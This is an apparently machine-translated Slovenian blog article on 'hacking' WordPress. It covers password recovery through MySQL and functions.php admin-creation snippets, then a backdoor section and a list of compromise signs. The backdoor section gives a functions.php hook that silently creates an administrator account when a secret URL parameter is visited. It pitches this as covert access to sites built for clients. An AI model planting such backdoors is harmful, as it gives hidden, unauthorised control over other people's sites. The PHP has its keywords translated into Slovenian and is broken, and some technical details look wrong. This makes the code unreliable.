Kako vdreti v WordPress spletno mesto, celoten vodnik

Kako vdreti v WordPress spletno mesto, celoten vodnik


Ne obljubljamo, ne odobravamo in ne spodbujamo nobenega nezakonitega ali zlonamernega ravnanja! Namen tega članka je razložiti, kako vstaviti ali obnoviti dostop do mesta WordPress, ki vam pripada, ali da imate pravice do urejanja, upravljanja in dostopa. Karkoli naredite, to počnete sami. Nismo odgovorni za vaša dejanja. Ta priročnik služi samo v izobraževalne namene.

Opisane metode vam bodo pomagale, da si povrnete dostop do spletnega mesta, tudi če nimate več računa, vendar boste potrebovali nekaj informacij o spletnem mestu in vam ne bodo pomagali vdreti v nobeno naključno namestitev WordPressa.

V tem priročniku vam bomo pokazali:

  • Kako vdreti v WordPress spletno mesto
  • Kako ustvariti backdoor v WordPressu
  • Kako ustvariti nov uporabniški račun prek FTP
  • 10 znakov je, da je vaše WordPress spletno mesto vdrto

Kako vdreti v WordPress spletno mesto, celoten vodnik

Razmere, v katerih si lahko pomagate sami

Če ste v eni od naslednjih situacij, vam bodo naše metode pomagale, da ponovno pridobite dostop:

  • ste pozabili uporabniško ime ali e-poštni naslov
  • možnost ponastavitve gesla ne deluje na strežniku gostovanja
  • ponastaviti gesla e-poštnih sporočil ne bodo prišli
  • nimate več dostopa do e-poštnega naslova računa
  • poznate uporabniško ime in geslo, vendar kombinacija preprosto ne deluje

Za uporabo spodaj opisanih metod boste morali le eno od naslednjih:

  • Dostop do strežnika FTP ali
  • cPanel dostop do strežnika ali
  • dostop do baze podatkov MySQL in možnost daljinske povezave

1. metoda – način MySQL

S to metodo spremenite geslo (ali po potrebi uporabniško ime) obstoječega uporabnika ali ustvarite nov račun. Potrebovali boste dostop cPanel ali neposreden dostop do MySQL do baze podatkov spletnega mesta. Začnimo s spremembo gesla obstoječega uporabnika.

Če uporabljate cPanel, se lahko prijavite (cPanel je vedno dostopen prek https://yoursite.com:2083 povezavo), poiščite in odprite phpMyAdmin. Seznam baz podatkov in tabel je na levi strani. Iščete tabelo, ki se konča _ uporabniki. Verjetno bo wp_users, če pa imate na strežniku nameščeno več spletnih mest WordPress, morate najti pravo.

V desni tabeli bo v njej uporabnik, ki ga želite urediti. Če se povezujete z MySQL prek katerega koli zunanjega odjemalca, sledite istemu postopku SQLyog. Ko najdete tabelo in dejanski uporabniški zapis, je čas, da spremenite geslo.

Kot ste verjetno že ugotovili, je geslo shranjeno v user_pass polje, razpršeno z algoritmom MD5. Odprite spletni MD5 generator vnesite geslo, ki ga želite uporabiti, in kliknite »Hash«. Kopirajte ustvarjeni niz in zamenjajte izvirno geslo z njo. V phpMyAdmin lahko polje uredite tako, da dvokliknete nanj. Postopek je podoben pri drugih odjemalcih MySQL. Shranite spremembe in se prijavite v WordPress z novim geslom.

Tabela uporabnikov WP

Uporabniška imena, šifrirana gesla in e-poštna sporočila so shranjeni v wp_users tabela podatkovnih baz

Še vedno na 1. metodi – ustvarjanje novega uporabnika

Ustvarjanje novega uporabnika je v manj kot minuti nekoliko bolj zapleteno, a vseeno obvladljivo. Ustvari nov zapis v tabeli uporabnikov in napolnite: user_login, user_pass (hashed, z uporabo zgoraj opisane funkcije MD5) in user_email. Vsa ostala polja lahko ostanejo prazna; nista pomembna. Shranite nov zapis. Ko je shranjen, mu bo MySQL dal edinstven ID. To je številka v polju ID. Zapomni si ga.

Zdaj pa pojdi na _usermeta mizo. Ne pozabite, predpona tabele mora biti enaka kot uporabniška. Na primer wp_users in wp_usersmeta. Če predpona ni enaka, urejate napačno tabelo (nekatere druge namestitve WP) in nov račun ne bo deloval. Ustvarili bomo dva nova zapisa. Ignoriraj umeta_id polje za oba. Set Uporabniško ime polje do vrednosti, ki ste jo pravkar zapomnili (nova vrednost ID v tabeli uporabnikov). Za prvi niz rekordov meta_key do wpct_user_level in meta_value do 10. Za drugo meta_key do wpct_capability in meta_value do a: 1: {s: 13: "administrator"; b: 1;}. Shranite oboje. Končali ste – prijavi se!

Metoda št. 2 – način funkcije.php

Ta pristop je mogoče uporabiti bodisi z urejanjem funkcije.php prek cPanela bodisi z uporabo odjemalca FTP. Če uporabljate cPanel, poiščite File Manager in ga odprite. Najprej moramo najti mapo aktivne teme.

Pojdi do public_html / wp_content / themes mapo. Če takoj vidiš svojo temo in veš, katera je – super. Odprite mapo in začnite urejati function.php. Če ne, odprite spletno mesto, z desno miškino tipko kliknite kjer koli in izberite »Prikaži vir«. Nato pritisnite Ctrl + F in začnite tipkati / teme / kmalu boste označili veliko URL-jev in prepoznali boste ime mape aktivne teme.

Poiščite ga v strukturi datotek, odprite in začnite urejati function.php. Kopirajte / prilepite naslednjo kodo na koncu datoteke. Ne pozabite na zaključek ?> Oznake PHP, če jih imate. Morajo biti na zadnji liniji. Torej vstavite kodo pred njimi.

$ new_user_email = '[email protected]';
$ new_user_password = '12345';

if (! uporabniško ime_obstaja ($ new_user_email)) {
$ user_id = wp_create_user ($ new_user_email, $ new_user_password, $ new_user_email);

wp_update_user (array ('ID' => $ user_id, 'vzdevek' => $ new_user_email));

$ user = nov WP_User ($ user_id);
$ user-> set_role ('administrator');
}

Uredite samo prvi dve vrstici kode, da bosta odražala svoj novi račun. Če je v WP že uporabnik s tem e-poštnim sporočilom, novi račun ne bo ustvarjen, zato se prepričajte, da je nov. Spremenite tudi geslo – ne skrivajte se otrok s skripta. Ko shranite datoteko, preprosto odprite spletno mesto, se bo zagnala koda, ustvaril se bo nov račun s skrbniškimi pravicami in se boste lahko prijavili z njim.

Ko to storite, ne pozabite izbrisati kode iz function.php.

Druge metode vdora

S poznavanjem gesla za FTP, cPanel ali MySQL dokazujete, da imate zakonito pravico do dostopa do strežnika, zato morate imeti dostop tudi do namestitev WordPress. Če nimate nobenega od teh računov, vam ne bo nič dobro (vdrla na spletna mesta drugih ljudi) in to ni lepo!

Ne pozabite, da je dostop do kakršnih koli računalnikov, spletnih mest ali strežnikov hudo kaznivo dejanje in se v večini držav takoj obravnavajo..

Če se bojite, da je vaše spletno mesto WordPress mogoče vlomiti, preverite to stran z brezplačnim varnostnim skenerjem WordPress. Če nimate časa za vzpostavitev svojega spletnega dnevnika, nam to naredimo za vas.

Kako ustvariti backdoor v WordPressu

Ko so vhodna vrata zaprta, lahko poskusite zadnja vrata. To se lahko sliši kot zlonamerni način uporabe kode za vstop na spletno mesto, ne da bi imeli dostop do njega, vendar dejansko obstajajo časi, ko morate nadzirati svoje spletno mesto, če ga je kdo ukradel.

Če ustvarite spletna mesta za druge ljudi, ki jih počnete, prej ali slej pride stranka, ki vam noče plačati za vaše delo; odjemalec, ki bo izbrisal vaše podatke za prijavo in prevzel nadzor nad vsem, kar ste storili. Včasih bo dovolj, da ustvarite novega uporabnika prek FTP ali ponastavite geslo. Ko to ni dovolj, boste morda želeli vdreti nazaj ali ustvariti zaledni dostop do svojih skrbniških strani.

Če pa bi se odločili skriti majhen delček kode v svojem WordPress okolju, si lahko prihranite nekaj dostojanstva in pridobite dostop do spletnega mesta WordPress s skrbniškimi pravicami. In tu se začnejo igre.

Ne glede na to, kolikokrat ta tat izbriše vaše podatke ali obnovi varnostno kopijo na strežniku, ki ga verjetno ima v lasti, obstaja možnost, da ne pozna ničesar o zadnjih vhodih. Če bi to storil, verjetno ne bi niti potreboval vaše pomoči pri postavljanju WordPressa, kajne?

Ustvari zakulisje:

OK, dovolj s pogovorom; tu je delček kode, ki ga boste morali opraviti:

  1. Odprite function.php datoteko
  2. Kopiraj / prilepi to kodo:
  3. dodajanje ('wp_head', 'wploop_backdoor');
    funkcija wploop_backdoor () {
    If ($ _GET ['backdoor'] == 'knockknock') {
    zahtevati ('wp-Includes / registration.php');
    Če (! Uporabniško ime_objavlja ('uporabniško ime')) {
    $ user_id = wp_create_user ('ime', 'prehod');
    $ user = nov WP_User ($ user_id);
    $ user-> set_role ('administrator');
    }
    }
    }
    ?>
  4. Shrani spremembe

Če pustite kodo takšno, kakršna je, bi morali obiskati vse, kar bi morali ustvariti novega skrbnika na spletnem mestu http://www.yourdomain.com/?backdoor=knockknock

Po nalaganju strani je vaše novo uporabniško ime “Ime” in geslo “Mimo”.

Seveda, lahko to spremenite v kodi zgoraj s spreminjanjem imena in prenosa na karkoli želiš. Povezavo do zadnjih vrat lahko spremenite tudi tako, da spremenite ‘backdoor’ in / ali ‘knockknock’ na vse, kar se vam zdi.

Preizkusite funkcijo – ne samo, da je zabavna, ampak vam lahko resnično pomaga kdaj v prihodnosti, ko boste spletnega mesta naredili za nekoga, ki mu ne morete popolnoma zaupati. Prav tako bi morali izravnati svoje WordPress in veščine bloganja.

Kako ustvariti nov uporabniški račun prek FTP

Ustvarjanje novih uporabniških računov v WordPressu je zelo enostavno. Kot skrbnik morate to storiti pomaknite se do strani Administrator uporabnikov kjer lahko ustvarite nov račun za katero koli vlogo uporabnika. To je mogoče storiti v nekaj sekundah in na novo ustvarjeni uporabnik se lahko takoj prijavi z navedenim uporabniškim imenom in geslom.

Toda kaj se zgodi, če izgubite dostop do svojega skrbnika WordPressa? Stvari se lahko nekoliko zapletejo, vendar ne skrbite – za vas imamo funkcijo, ki vam lahko reši življenje skrbnika.

Ne glede na to, ali je drug skrbnik izbrisal vaš račun, ali ste po pomoti izbrisali vse uporabnike iz baze podatkov, uporabljali nepravilno delujoč vtičnik ali se vdrli, lahko še vedno dobite nadzor. Včasih boste morda imeli dostop samo do svojega FTP strežnika, medtem ko bo HTTP izven vašega dosega in boste morali ustvariti novega skrbnika. Čeprav je to lahko redek primer, vas bo naslednja funkcija prihranila.

Če želite ustvariti nov račun zunaj skrbniškega okolja WordPress, vse kar boste potrebovali je FTP dostop do vaše spletne strani. Kot skrbnik bi morali imeti vse potrebne podatke za prijavo v strežnik in lahko hitro ustvarite nov račun z ustvarjanjem nove funkcije v svoji temi.

Ustvarite nov uporabniški račun prek FTP:

  1. Odprite odjemalca FTP in se povežite s svojim računom
  2. Pomaknite se do wp-vsebine / teme
  3. Odprite mapo teme, ki jo uporabljate
  4. Poiščite funkcijo function.php in jo uredite
  5. Kopirajte in prilepite naslednjo funkcijo:
  6. funkcija admin_account () {
    $ user = 'Uporabniško ime';
    $ pass = 'Geslo';
    $ email = '[email protected]';
    if (! uporabniško ime_exists ($ uporabnik) &&! email_exists ($ email)) {
    $ user_id = wp_create_user ($ user, $ pass, $ email);
    $ user = nov WP_User ($ user_id);
    $ user-> set_role ('administrator');
    }}
    dodajanje ('init', 'admin_account');
    
  7. Spremenite uporabniško ime, geslo in e-pošto v nekaj edinstvenega
  8. Shrani spremembe

Prepričajte se, da so uporabniško ime, geslo in e-poštni naslov, ki jih nastavite v tej funkciji, edinstveni ali drugače funkcija ne bo delovala pravilno. Ko shranite spremembe, ste končali in se lahko pomaknite do svoje prijavne plošče WP. Za ponovno prijavo uporabite nove podatke in ko preverite račun, lahko funkcijo izbrišete iz datoteke function.php.

Zgoraj prikazana funkcija ustvari skrbniški račun, vendar ga lahko preprosto spremenite in ustvarite račun s katero koli drugo vlogo uporabnika. Preprosto spremenite vlogo na 8th vrstica kode urejevalniku, avtorju, avtorju prispevka, naročniku ali kateri koli drugi uporabniški vlogi, ki ste jo ustvarili.

Na žalost, če ste izgubili skrbniški račun, ste izgubili tudi vse objave, napisane pod tem uporabniškim imenom. Zato morate vedno hraniti varnostno kopijo, ki jo lahko enostavno pridobite. Če berete to, medtem ko imate skrbniški račun, vzemite to kot opomnik, da takoj ustvarite varnostno kopijo in zaznami ta članek, samo v primeru, da boste morali v prihodnosti ustvariti račun zunaj WordPress-a.

10 znakov je, da je vaše WordPress spletno mesto vdrto

WordPress je velika platforma za bloganje. Uporabnikov je na milijone in zdi se, da število vsak dan hitro raste. Ljudje celo pogosteje prenašajo svoja spletna mesta, ustvarjena v drugih sistemih za upravljanje vsebine, v ta odprtokodni sistem, kot si morda mislite. In čeprav je to dobro, to pomeni hekerji bodo WordPress tudi postavili na prvo mesto, ko poskušajo vdreti na naključna mesta.

Običajno, če vas bodo zasledili, boste o tem vedeli takoj. Vaša spletna stran bo postala nedostopna; se ne boste mogli prijaviti, včasih pa bo heker celo pustil sporočilo na prvi strani. Toda pogosteje kot ne, morda niti ne opazite, da se je nekaj spremenilo. V tem delu članka bomo pokazali več znakov, ki bi vam lahko pokazali, da se je vaše spletno mesto WordPress pokvarilo, in nekaj rešitev težave.

1. Neuspešna prijava

Ta znak je precej očiten. Če že nekaj časa uporabljate kombinacijo uporabniškega imena in gesla, ne da bi imeli kdaj težave, lahko postanete sumljivi, če nenadoma WordPress ne prepozna vašega računa. Če se heker prijavi na vaše spletno mesto, obstaja velika verjetnost, da bo hitro spremenil vaše skrbniške privilegije.

Mogoče je moral spremeniti vaše geslo ali popolnoma izbrisati vaš račun. Preden začnete WordPress prvič obvestiti o napačnem uporabniškem imenu / geslu, upoštevajte dejstvo, da ste morda vnesli napačno kombinacijo ali da ste morda vklopili gumb za zaklepanje.

Rešitev: Poskusite obnoviti geslo po e-pošti ali za prijavo uporabiti drug račun. Če želite zagotoviti, da ostane prijazen, priporočamo namestitev Prijava Ninja vtičnik za WordPress.

2. Zlonamerna vsebina se doda na vaše spletno mesto

Spletno mesto vsebuje opozorilo zlonamerne programske opreme

Če na svojem spletnem mestu začnete opažati neznano vsebino, boste morda začeli skrbeti. Ko dobijo možnost dostopa do vašega skrbniškega območja, hekerji bodo lahko spremenili vaše jedro ter vaše teme in datoteke vtičnikov. To pomeni, da lahko spremenijo karkoli hočejo.

Medtem ko bodo nekateri hekerji drastično spremenili videz vašega spletnega mesta in morda celo zapisali, da ste se vdrli, bodo drugi precej bolj subtilni.

Rešitev: V kodi spletnega mesta poskusite iskati skrito vsebino. Morda so povezave do zlonamernih spletnih mest hekerji, posajeni v nogi vašega spletnega mesta, ali pa so morda nameščeni pojavni okni, ki se bodo redno odpirali za vaše stranke. Uporabite Security Ninja za skeniranje vašega spletnega mesta ali za stalno spremljanje spletnega mesta zaradi takšnih težav.

3. Sumljivi obiski

Če ne sledite svojemu spletnemu mestu, morate začeti s tem takoj. Preprost način uporabe je Google Analytics, ki vam med številnimi drugimi funkcijami lahko pove, koliko obiskov dobite in od kod prihajajo ti obiski. Čez nekaj časa boste spoznali svojo spletno stran. To pomeni, da boste vedeli, od kod prihajajo obiski, vedeli boste, kdaj začnete novo kampanjo in kdaj bodo v naravi objavljene nove promocijske povezave.

Če pa nenadoma opazite, da vaše spletno mesto dobiva ogromno novih obiskov iz sumljive domene, to boste želeli še raziskati, ker bo vaše spletno mesto morda preprosto vdrlo. Običajno bodo zaradi takšnih obiskov stopenjska stopnja obiskov ene strani, kar pomeni, da je bila dostopna samo ena stran. Hekerji bodo pogosto uporabljali avtomatizirane sisteme, ki bodo pripeljali druga slaba spletna mesta na vaša. Ne glede na to, ali gre za slabo kodo, ki se izvrši na vašem spletnem mestu ali pa ste postali del neželene vsebine, lahko stvari postanejo resne, zato boste morali na svojem spletnem mestu preveriti zlonamerno kodo.

Rešitev: Uporaba Google Orodja za spletne skrbnike najti sumljive domene

4. Nenaden padec prometa

Stanje spletnega mesta varno brskanje

Za razliko od zadnjega omenjenega znaka hakiranja vas lahko ta opozori, ker je število obiskov nenadoma upadlo. Namesto da bi se na vas sklicevali na nove obiske, heker lahko pošlje obiske stran od vašega spletnega mesta. To se lahko zgodi, ker je heker preusmeril vaše spletno mesto na drugo. Drugi razlog za pridobivanje manjšega števila obiskovalcev je ta, da je Google spletno mesto uvrstil na seznam. To dejanje bi pokazalo sporočilo vsem uporabnikom, ki se bodo odločili, da ne bodo odprli vašega spletnega mesta, ker je okuženo.

Rešitev: Uporabite Googlove Stanje spletnega mesta za varno brskanje da preverite, ali je vaše spletno mesto označeno kot nevarno in ga je trenutno nevarno obiskati.

5. Rezultati iskalnikov so čudni

Če na svojem spletnem mestu niste opazili nobenih sprememb, vendar ugotovite, da so rezultati iskanja v Googlu in drugih iskalnikih čudni (prikazujejo različne naslove in druge metapodatke), je to lahko jasen znak, da je spletno mesto vdrlo. Heker je morda spremenil vašo vsebino na način, ki je viden samo strokovnjaku. Kljub temu bi bila sprememba vidna v rezultatih iskalnikov.

Rešitev: Preverite spletno mesto Google Orodja za spletne skrbnike, in preverite, ali se je vaše spletno mesto s tem lomilo brezplačno spletno orodje.

6. Ne morete pošiljati / prejemati e-poštnih sporočil

Ko bo heker dobil dostop do vašega spletnega mesta, si ga bo verjetno želel uporabite svoj strežnik za neželeno pošto vseh ostalih. Ko ugotovite, da ne morete pošiljati ali prejemati novih e-poštnih sporočil s svojega WordPressa, je to lahko jasen znak, da ste se zlomili. Še enkrat preverite svojo e-pošto, nato pa preverite pri ponudniku in se prepričajte, da ni napak.

Rešitev: Preizkusite WordPress funkcija pošte s tem brezplačnim vtičnikom.

7. Spletno mesto ne obstaja

Strežnika ni mogoče najti

Obstajajo časi, ko hekerji ne bodo dostopali do vašega spletnega mesta, da bi postavili zlonamerno kodo, preusmerili uporabnike ali uporabili vaš e-poštni naslov za neželeno pošto. Včasih, vse, kar bodo želeli, je, da zrušijo vaše spletno mesto. Redko bo heker uspešno izbrisal vse iz celotnega strežnika. Zato je pomembno, da svoje datoteke gostite pri priznanem gostiteljskem podjetju, ki bo poskrbelo za varnost in hkrati hranilo dnevne ali vsaj tedenske varnostne kopije vašega spletnega mesta. Dobro je, da občasno naredite tudi varnostne kopije, da lahko spletno mesto hitro obnovite.

Rešitev: V WordPress namestite enega najboljših vtičnikov za upravljanje varnostnih kopij.

8. Sumljive datoteke

Podobno kot zlonamerna vsebina, ki se lahko doda obstoječim datotekam, heker lahko posadi dodatne datoteke kjer koli v vaši korenski mapi. Dobro je vedeti, kako se srečujete s WordPressom, če pa niste izkušeni, bi morali imeti na razpolago varnostno orodje, ki lahko preveri vse vaše datoteke in dejavnosti. Pred kratkim smo pregledali Security Ninja, ki je odlično orodje za preverjanje vseh vaših WordPress datotek.

Rešitev: Poskusite iskati datoteke, ki ne spadajo v vašo namestitev WordPressa. Uporabite varnostni Ninja za redno pregledovanje vašega spletnega mesta in samodejno iskanje teh datotek. Nato izbrišite datoteke ali odstranite zlonamerno kodo iz okuženih datotek. Ne pozabite na dodatek Core Scanner za varnost Ninja.

9. Novi člani

Glede na vašo spletno stran ste morda edini, ki lahko dodate nove člane. V tem primeru lahko e-poštno sporočilo z na novo registriranimi uporabniki sproži alarm. Če obstajajo drugi skrbniki, ki lahko dodajo nove člane, preverite pri njih sumljive dejavnosti.

Rešitev: Spremenite prijavni URL z brezplačnim vtičnikom, omejite dostop do svoje strani za prijavo v WordPress z datoteko .htpasswd in uporabite Ninja Ninja za zaščito obrazca za prijavo ves čas.

10. Oglejte si načrtovane dogodke na vašem strežniku

Včasih heker ne bo storil ničesar na vašem spletnem mestu, potem ko najde svoj vstop. Namesto tega, zapustili bodo predvidene dogodke kar lahko škoduje vašemu spletnemu mestu kdaj v prihodnosti. Ta tehnika je nevarna, ker heker lahko neizkušeno žrtev sprva pusti brez besed. Morda ste okuženi in o tem ničesar ne veste.

Rešitev: Preverite svoja CRON opravila na strežniku, ki ga uporabljate, in se prepričajte, da ni sumljivih načrtovanih opravil.

Zavijanje

Upamo, da vam bo ta članek pomagal upravljati celo varnejše spletno mesto WordPress in da vam bo pomagal povrniti dostop do njega v slabih situacijah. In tudi če je vaše spletno mesto čisto, prosim, ne vzemite tega za samoumevno.
Vedno se prepričajte, da je vaš blog čim bolj varen. Predlagamo varnostne vtičnike za WordPress, ki vas lahko prihranijo največkrat. Kljub temu ne uporabljajte nevarnega gesla in bodite previdni pri vpisu na svoje spletno mesto WordPress.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
    Like this post? Please share to your friends:
    Adblock
    detector
    map